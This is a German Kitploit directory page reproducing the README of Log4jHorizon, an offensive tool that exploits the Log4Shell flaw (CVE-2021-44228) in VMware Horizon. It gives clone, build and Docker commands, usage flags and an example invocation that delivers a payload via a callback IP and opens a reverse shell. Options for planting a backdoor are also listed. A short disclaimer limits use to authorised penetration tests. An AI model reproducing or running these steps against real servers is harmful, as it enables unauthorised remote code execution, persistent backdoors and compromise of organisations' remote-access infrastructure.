Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Log4jHorizon — Ausnutzung von CVE-2021-44228 in VMWare Horizon für Remote-Codeausführung und mehr. | Kitploit
Tools/GitHubGitHub/puzzlepeaches/log4jhorizon
SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHubpuzzlepeaches/log4jhorizon

Log4jHorizon

Ausnutzung von CVE-2021-44228 in VMWare Horizon für Remote-Codeausführung und mehr.

Repository anzeigen
120134vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Log4jHorizon

Ausnutzung von CVE-2021-44228 in VMWare Horizon für Remote-Code-Ausführung und mehr.

  • Crossing the Log4j Horizon - A Vulnerability With No Return

Code und README.md sind dieses Mal etwas verstreut. Updates folgen!

Warum?

Proof-of-Concept-Exploits für diese Schwachstelle sind verstreut und müssen manuell durchgeführt werden. Dieses Repository automatisiert den Exploit-Prozess. Siehe den Blogbeitrag oben für Anleitungen zur Post-Exploitation.

Installation

Dieses Repository kann manuell oder mit Docker verwendet werden.

Manuelle Installation

Um den Exploit manuell herunterzuladen und auszuführen, führen Sie die folgenden Schritte aus. Stellen Sie zunächst sicher, dass Java und Maven auf Ihrem Angreifer-Host installiert sind. Führen Sie dazu auf Debian-basierten Betriebssystemen den folgenden Befehl mit apt aus:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

Klonen Sie das GitHub-Repository und installieren Sie alle Python-Anforderungen:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && pip3 install -r requirements.txt

Kompilieren Sie vom Stammverzeichnis des Log4jHorizon-Repositorys das Rogue-Jndi-Projekt mit dem folgenden Befehl:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Docker-Installation

Stellen Sie zunächst sicher, dass Docker auf Ihrem Angreifer-Host installiert ist. (Ich werde Sie nicht durch diesen Prozess führen)

Führen Sie anschließend den folgenden Befehl aus, um das Repository zu klonen und das Docker-Image zu erstellen, das wir verwenden werden.

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && docker build -t Log4jHorizon .

Um den Container auszuführen, führen Sie einen Befehl ähnlich dem folgenden mit Ihren angehängten Befehlszeilenflags aus. Beachten Sie, dass der Container keine Reverse Shell abfängt. Sie müssen einen ncat-Listener in einer separaten Shell-Sitzung erstellen:

root@kitploit:~
docker run -it -p 1389:1389 Log4jHorizon \
    -r -t horizon.acme.com -i 192.168.1.1 -p 4444

Verwendung

root@kitploit:~
usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  VMWare Horizon IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -r, --revshell        Module to establish reverse shell using node.exe.
  -b, --backdoor        Module to add backdoor.

Beispiele

Erhalten Sie eine Reverse Shell mit dem auf Ihrem lokalen System installierten Tool:

root@kitploit:~
python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1

Haftungsausschluss

Dieses Tool ist für den Einsatz während Penetrationstests konzipiert; die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Es liegt in der Verantwortung des Endbenutzers, alle geltenden lokalen, staatlichen und bundesstaatlichen Gesetze einzuhalten. Die Entwickler übernehmen keine Haftung und sind nicht für jeglichen Missbrauch dieses Programms verantwortlich.

Tool herunterladen